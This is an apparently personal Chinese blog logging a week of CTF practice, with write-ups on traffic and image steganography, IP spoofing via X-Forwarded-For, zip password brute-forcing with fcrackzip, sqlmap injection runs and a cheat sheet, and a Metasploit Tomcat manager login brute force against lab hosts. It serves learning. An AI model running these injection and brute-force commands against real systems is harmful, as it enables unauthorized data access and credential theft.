Secat's Blog

学习·记录

这世界变化快的真是铃儿响叮当


第二十四周总结

7.31

0x00 每日总结

今天主要做了15年和16年的隐写和密码部分的题目。 下面总结一下个别我觉得有收获的题目。

0x01 DNS数据包

第一步,把所有的DNS流过滤出来,然后按显示顺序逐个取数值,数值在每个IP前面有显示(以十六进制进制显示,然而我之前也找到过这个数值,但是没有发现什么特征就放过了,后来才知道我发现的是第一串是纯数字,所以给放过了),把找到的十六进制字符串按顺序拼接起来。 第二步,HEX->ASCII->base64

0x02 HTTP数据包

这道题感觉有些坑…但是仔细一想倒也没毛病。关键是把数据隐藏到某个http流后面,在查看的时候发现了好多图片,但是没头绪,继续找,看到了

GET /askldj3lkj234.php HTTP/1.1 有个php文件,打开在最下面看到了flag;真·坑

0x03 MP3

这道题我只知道做法但是由于我的python出现问题还没解决所以没有自己跑出来。 这题打开之后是一个.mp3文件和一个hint.txt文件,打开hint,里面是RGB值,而且像素点不是黑就是白,大致应该是个二维码,用python写脚本就可以转出图像,图像有提示密码的范围,再写python脚本跑密码。

爆出密码之后用MP3stego执行命令,应该可以得到一个txt文件,里面有flag.

8.01

0x00 每日总结

今天主要跟着讲解系统地学习了SQL注入、文件上传漏洞等一部分关于web安全的知识。

0x01 貌似有点难

http://ctf5.shiyanbar.com/phpaudit/ 这是个代码审计的题,题目给出以下代码:

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
	$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
	$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
	$cip = $_SERVER["REMOTE_ADDR"];
else
	$cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?> 最关键的一句是 

$GetIP=="1.1.1.1" 也就是说,当得到的本地IP为1.1.1.1时输出flag,那么我们的任务就是伪造IP,这里就要抓包修改request,具体做法是:
	在request中增加X-Forwarded-For:1.1.1.1 forward在页面上得到flag

0x02 猫抓老鼠

提示是catch,那么就是抓包咯 抓包看request,里面没有什么东西,在再放入repeater看response,

HTTP/1.1 200 OK
Date: Tue, 01 Aug 2017 14:46:07 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Row: MTUwMTU5ODYxMQ==
Content-Length: 14
Connection: close
Content-Type: text/html

Check Failed! 发现Content-Row里面有一串base64加密的字符串,尝试性地放入password里面,竟然通过了==、

8.02

0x00 每日总结

0x01 复杂的QR_code

http://www.shiyanbar.com/ctf/1856 打开是一张二维码,扫出结果是“secret is here”,那么flag应该在这张图片上。 用winhex打开图片,在下部发现了一个txt文件,拖进kali,binwalk分离,得到一个加密的压缩包,且在kali下无法打开,应该不是伪加密。只能暴力破解了。由于没有关于密码组成的线索,只能使用穷举法 root@kali:~/CTF/Shiyanbar/_QR_code.png.extracted# fcrackzip -b -c ‘aA1’ -l 1-10 -u 1D7.zip

PASSWORD FOUND!!!!: pw == 7639 题的思路很简单,收获是学会了kali下的一个爆破压缩包密码的命令fcrackzip。

1.穷举法:
# fcrackzip -b -c 'aA1!' -l 1-10 -u crack_this.zip 
-b代表brute-force;-l限制密码长度;-c指定使用的字符集:

2.使用字典:
下面以Kali Linux自带的rockyou字典为例,还可以去网上下载GB级的大字典。
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u crack_this.zip

3.关于fcrackzip的更多信息请看man手册:
# man fcrackzip

0x02 Dark Star

http://www.shiyanbar.com/ctf/1989 读题,藏东西,方法大致已经确定了。 其实很简单,只不过一开始用错了命令,此处正确姿势是foremost

root@kali:~/CTF/Shiyanbar# foremost darkstar.img 
Processing: darkstar.img
|*| 分离出![](http://ou0111n4v.bkt.clouddn.com/QQ%E5%9B%BE%E7%89%8720170803132412.png) 内容,flag就在里面啦

8.03

0x00 每日总结

今天主要学习了渗透测试流程的一部分。

0x01 flags.xls

http://www.shiyanbar.com/ctf/1919

下载文件打开后发现是个加密的xls文件,第一反应是哇xls欸,没见过欸,能学到新姿势了~第二反应是分离,第三反应是强搜字符串,然后习惯性地用winhex打开,竟然getflag。。。

有点失望…题很水…

0x02简单的sql注入之3

http://www.shiyanbar.com/ctf/1909

感觉这道题最适合复习今天学习的关于注入的知识了。

1.查看注入点

输入1,回显“hello”;
输入1=1', 报错,判定存在注入漏洞。 ### 2.查看库
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
结果:
available databases [2]:
[*] information_schema
[*] web1

##说明有两个数据库 ### 3.查看当前数据库
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db
结果:
current database:    'web1'

##当前数据库为web1 ### 4.查询当前数据库里的表
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables -D "web1"
结果:
Database: web1
[2 tables]
+-------+
| flag  |
| web_1 |
+-------+

##当前数据库里有flag和web_1两个表,当然是选择flag表继续~ ### 5.查询列
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag"
结果:
Database: web1
Table: flag
[2 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| flag   | char(30) |
| id     | int(4)   |
+--------+----------+	

##	flag表下有两个列,当然是选择flag列继续~ ### 6.查询字段
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dump -C "flag" -T "flag"
结果:
Database: web1
Table: flag
[1 entry]
+----------------------------+
| flag                       |
+----------------------------+
| flag{Y0u_@r3_5O_dAmn_90Od} |
+----------------------------+

##getflag!

0x02 靶机·拿flag(keyword: sqlmap,tamper,waf)

前提:已知此页面存在注入漏洞。 # #查数据库 E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u “http://192.168.2.191:8000/Art_Show.php?id=3” –tamper “space2comment.py” –dbs

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
available databases [4]:
[*] information_schema
[*] mysql
[*] onecms
[*] performance_schema #
#查表
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://192.168.2.191:8000/Art_Show.php?id=3" --tamper "space2comment.py" -D "onecms" --table
Database: onecms
[15 tables]
+-----------------+
| flag            |
| onecms_about    |
| onecms_access   |
| onecms_admin    |
| onecms_article  |
| onecms_book     |
| onecms_botlist  |
| onecms_count    |
| onecms_down     |
| onecms_hits     |
| onecms_keywords |
| onecms_link     |
| onecms_pro      |
| onecms_system   |
| onecms_type     |
+-----------------+ #
#查列
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://192.168.2.191:8000/Art_Show.php?id=3" --tamper "space2comment.py" -D "onecms" -T "flag" --column
*
Database: onecms
Table: flag
[1 column]
+--------+----------+
| Column | Type     |
+--------+----------+
| flag   | char(30) |
+--------+----------+ #
#查字段
E:\00我的工具\Sqlmap\SQLmap>sqlmap.py -u "http://192.168.2.191:8000/Art_Show.php?id=3" --tamper "space2comment.py" -D "onecms" -T "flag" -C "flag" --dump
*
Database: onecms
Table: flag
[1 entry]
+-------------------------+
| flag                    |
+-------------------------+
| flag{YouCan_Use+Tamper} |
+-------------------------+

0x03 sqlmap常见用法(小结)

./sqlmap.py -u "url" --dbs	#列举数据库
./sqlmap.py -u "url" --current-db	#当前数据库
./sqlmap.py -u "url" --users	#列数据库
./sqlmap.py -u "url" --current-user		#当前用户
./sqlmap.py -u "url" --tables -D "数据库"	#列举数据库的表名
./sqlmap.py -u "url" --tables 	#列表
./sqlmap.py -u "url" --columns -T "tablename" -D "数据库" 	#获取表的列名
./sqlmap.py -u "url" -T "表名" -C "列名" --dump	#获取表中的数据,包括列
./sqlmap.py -u "url" --dump -C "字段" -T "表名" -D "数据库"	#获取表中的数据,包含列

8.4

##0x00 Guess Next Session http://www.shiyanbar.com/ctf/1788 查看源码:

<?php
session_start(); 
if (isset ($_GET['password'])) {
if ($_GET['password'] == $_SESSION['password'])
die ('Flag: '.$flag);
else
print '<p>Wrong guess.</p>';
}

mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

发现只要满足

$_GET['PASSWORD'] == $_SESSION['password'] 就能输出flag。 然后用burp抓包清空password和session,使get和session相等,getflag

0x01 Forms

http://www.shiyanbar.com/ctf/1819 这个题用burp就够了。

首先提交1,提示

User with provided PIN not found.  查看不到源代码,只能抓包看看了(部分信息)

Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Referer: http://ctf5.shiyanbar.com/10/main.php
Cookie: PHPSESSID=aot3k7k8fkein4u7uc09f7de81; PHPSESSID=24c86f06d813ded67d05ff1b45cc6732
Connection: close
Upgrade-Insecure-Requests: 1

PIN=1&showsource=0 将最后一行的showsource的值改为1再查看,发现网页带有了提示代码:

$a = $_POST["PIN"];
if ($a == -19827747736161128312837161661727773716166727272616149001823847) {
echo "Congratulations! The flag is $flag";
} else {
echo "User with provided PIN not found."; 
}

把PIN码输入输入框中,getflag



0x02 学习记录

C:\Users\JY\Desktop > msfconsole

DL is deprecated, please use Fiddle

 ______________________________________________________________________________
|  |
|  3Kom SuperHack II Logon |
|______________________________________________________________________________|
|  |
|  |
|  |
| User Name:  [   security]|
|  |
| Password:   [   ]|
|  |
|  |
|  |
|   [ OK ] |
|______________________________________________________________________________|
|  |
|http://metasploit.com |
|______________________________________________________________________________|


   =[ metasploit v4.12.20-dev-841dada ]
+ -- --=[ 1572 exploits - 906 auxiliary - 270 post]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

-

msf > search tomcat

[!] Module database cache not built yet, using slow search
  
Matching Modules  
================  
  
   Name Disclosure Date  Rank 
escription
   ---- ---------------  ---- 
----------
   auxiliary/admin/http/tomcat_administrationnormal   
omcat Administration Tool Default Access  
   auxiliary/admin/http/tomcat_utf8_traversalnormal   
omcat UTF-8 Directory Traversal Vulnerability 
   auxiliary/admin/http/trendmicro_dlp_traversal normal   
rendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06   normal   
pache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding   2010-07-09   normal   
pache Tomcat Transfer-Encoding Information Disclosure and DoS 
   auxiliary/dos/http/hashcollision_dos 2011-12-28   normal   
ashtable Collisions   
   auxiliary/scanner/http/tomcat_enumnormal   
pache Tomcat User Enumeration 
   auxiliary/scanner/http/tomcat_mgr_login   normal   
omcat Application Manager Login Utility   
   exploit/multi/http/struts_code_exec_classloader  2014-03-06   manual   
pache Struts ClassLoader Manipulation Remote Code Execution   
   exploit/multi/http/struts_default_action_mapper  2013-07-02   excellent
pache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution   
   exploit/multi/http/struts_dev_mode   2012-01-06   excellent
pache Struts 2 Developer Mode OGNL Execution  
   exploit/multi/http/tomcat_mgr_deploy 2009-11-09   excellent
pache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload 2009-11-09   excellent
pache Tomcat Manager Authenticated Upload Code Execution  
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07   excellent
ovell ZENworks Configuration Management Arbitrary File Upload 
   post/windows/gather/enum_tomcat   normal   
indows Gather Apache Tomcat Enumeration   

-

msf > use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > set rhost 127  
rhost => 127 
msf auxiliary(tomcat_mgr_login) > set rhost 127.0.0.1
rhost => 127.0.0.1   
msf auxiliary(tomcat_mgr_login) > exploit
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOS
TS.  
msf auxiliary(tomcat_mgr_login) > exploit
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOS
TS.  
msf auxiliary(tomcat_mgr_login) > show options   
 
Module options (auxiliary/scanner/http/tomcat_mgr_login):
 
   Name  Current Setting 
Required  Description
   ----  --------------- 
--------  -----------
   BLANK_PASSWORDS   false   
noTry blank passwords for all users  
   BRUTEFORCE_SPEED  5   
yes   How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS  false   
noTry each user/password couple stored in the current
 database
   DB_ALL_PASS   false   
noAdd all passwords in the current database to the li
st   
   DB_ALL_USERS  false   
noAdd all users in the current database to the list  
   PASSWORD  
noA specific password to authenticate with   
   PASS_FILE F:/PentestBox2/PentestBox-v2.2/bin/metasploit-framework/data/wordlists/t
omcat_mgr_default_pass.txt  noFile containing passwords, one per line
   Proxies   
noA proxy chain of format type:host:port[,type:host:p
ort][...]
   RHOSTS
yes   The target address range or CIDR identifier
   RPORT 8080
yes   The target port
   SSL   false   
noNegotiate SSL/TLS for outgoing connections 
   STOP_ON_SUCCESS   false   
yes   Stop guessing when a credential works for a host   
   TARGETURI /manager/html   
yes   URI for Manager login. Default is /manager/html
   THREADS   1   
yes   The number of concurrent threads   
   USERNAME  
noA specific username to authenticate as 
   USERPASS_FILE F:/PentestBox2/PentestBox-v2.2/bin/metasploit-framework/data/wordlists/t
omcat_mgr_default_userpass.txt  noFile containing users and passwords separated by sp
ace, one pair per line   
   USER_AS_PASS  false   
noTry the username as the password for all users 
   USER_FILE F:/PentestBox2/PentestBox-v2.2/bin/metasploit-framework/data/wordlists/t
omcat_mgr_default_users.txt noFile containing users, one per line
   VERBOSE   true
yes   Whether to print output for all attempts   
   VHOST 
noHTTP server virtual host          

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.2.192

RHOSTS => 192.168.2.192 ### msf auxiliary(tomcat\_mgr_login) > exploit

[!] No active DB -- Credential data will not be saved!
[+] 192.168.2.192:8080 - LOGIN SUCCESSFUL: admin:admin
[-] TOMCAT_MGR - LOGIN FAILED: manager:admin (Incorrect: )
[-] TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

第二行带有[+]已显示账户和密码

THANKS

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码支持

^_^